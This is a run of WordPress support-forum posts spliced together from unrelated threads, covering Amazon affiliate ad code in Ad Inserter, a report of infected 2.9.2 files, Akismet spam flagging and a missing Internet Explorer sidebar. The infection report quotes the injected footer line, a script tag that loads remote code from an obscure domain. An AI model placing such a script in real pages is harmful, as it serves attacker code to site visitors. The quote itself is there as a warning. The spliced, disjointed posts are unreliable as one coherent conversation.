    Thanks so much @spacetime that worked! I used your steps to modify the first ad slot, so I can customize it on each post. Tried it here with baru nuts (an unusual nut from South America) and it worked beautifully: https://www.superfoodly.com/what-are-baru-nuts-nutrition-facts-benefits/

    Your’re right about 96 slots being plenty. Really 3-5 is all I should need.

    Thanks for reply. OK so it looks like I need to do this:

    Another solution is to use custom fileds to specify the product in the post and then use shortcode for this custom field in the ad code: https://adinserter.pro/documentation/manual-insertion#shortcodes

    Ok so let me take block 96 as an example. Right now I insert this in the blogpost to call the ad:

    [adinserter block=”96″]

    What I’m not understanding is how I modify block 96 to accommodate the keyword variable, and then how I call it.

    Do I add [adinserter custom-field=’product-name’] as the code in 96, like as follows?

    <script type="text/javascript">
    amzn_assoc_placement = "adunit0";
    amzn_assoc_search_bar = "true";
    amzn_assoc_tracking_id = "discount008-20";
    amzn_assoc_search_bar_position = "bottom";
    amzn_assoc_ad_mode = "search";
    amzn_assoc_ad_type = "smart";
    amzn_assoc_marketplace = "amazon";
    amzn_assoc_region = "US";
    amzn_assoc_title = "";
    amzn_assoc_default_search_phrase = "[adinserter custom-field='product-name']";
    amzn_assoc_default_category = "All";
    amzn_assoc_linkid = "d21b9803aa2fd437b5228659b544266b";
    </script>
    <script src="//z-na.amazon-adsystem.com/widgets/onejs?MarketPlace=US"></script>

    And if that is correct, then how do I call it in the blogpost using the custom product name? On [adinserter block=”96″] what do I add for the ability to insert the product name?

    Thanks

    Thanks for the reply but I’m not sure you understand my need. On a blog with say, 500 posts, in each post want to advertise the food being discussed. For example if it was about acai, you use links for acai powder as seen here: https://www.superfoodly.com/best-acai-powder/

    However it it’s about maqui, you use different ad as seen here: https://www.superfoodly.com/best-maqui-berry-powder/

    As you see, those use up 2 out of 96. Hitting 96 happens fast. So I do need hundreds.

    Unless I can code this field:

    <script type="text/javascript">
    amzn_assoc_placement = "adunit0";
    amzn_assoc_search_bar = "true";
    amzn_assoc_tracking_id = "discount008-20";
    amzn_assoc_search_bar_position = "bottom";
    amzn_assoc_ad_mode = "search";
    amzn_assoc_ad_type = "smart";
    amzn_assoc_marketplace = "amazon";
    amzn_assoc_region = "US";
    amzn_assoc_title = "";
    amzn_assoc_default_search_phrase = "<strong>barukas</strong>";
    amzn_assoc_default_category = "All";
    amzn_assoc_linkid = "d21b9803aa2fd437b5228659b544266b";
    </script>
    <script src="//z-na.amazon-adsystem.com/widgets/onejs?MarketPlace=US"></script>

    Is there a variable I can put in the bolded section (barukas) that would allow me to custimize this on each post? I looked at your documentation but couldn’t figure it out as I’m not a coder. Thanks

    Anyone home? This is urgent… I’m not talking about myself, but rather everyone else that is downloading these infected files from www.ads-software.com! I just restored my DB and files to pre-update. I’m going through the files downloaded from WordPress and these are so infected it’s not even funny. Someone needs to pull the 2.9.2 corrupt files ASAP I can’t even imagine how many people are being affected by this and probably don’t even know it.

    </div> <!-- Wrapper div -->

    <script src="https://kdjkfjskdfjlskdjf.com/kp.php"></script>
    </body>
    </html>

    That’s what’s in your footer! index.php, page.php, etc. are all infected with malicious code… I DOWNLOADED 2.9.2 DIRECTLY FROM www.ads-software.com! Someone needs to stop this!

    [Regarding Akismet] Thank you Samboll for fixing that. About Akismet, I can no longer even comment on blogs, except those of my friends which have had to go through the hassle of adding me to the “white list” because the akismet automatically assumes I’m spam. Can we fix this? I am not a company or anything else. I am just an individual (college student) and C.C.F. is my only website. (I did not write the name of my site in fear it would be flagged, but the URL is in my last post).

    [Another note unrelated to the subject matter] Samboll I just visited your site and want to send you a question in response to the subject of your blog – will the contact form work or will that flag me as spam too?

    Hi, thanks, well I did that and it got the posts to work, but now everything in the right-hand column has disappeared in Internet Explorer – the sponsors, blogroll, and archives. Any idea what would be causing this?

    side note: I HATE Microsoft products!!!
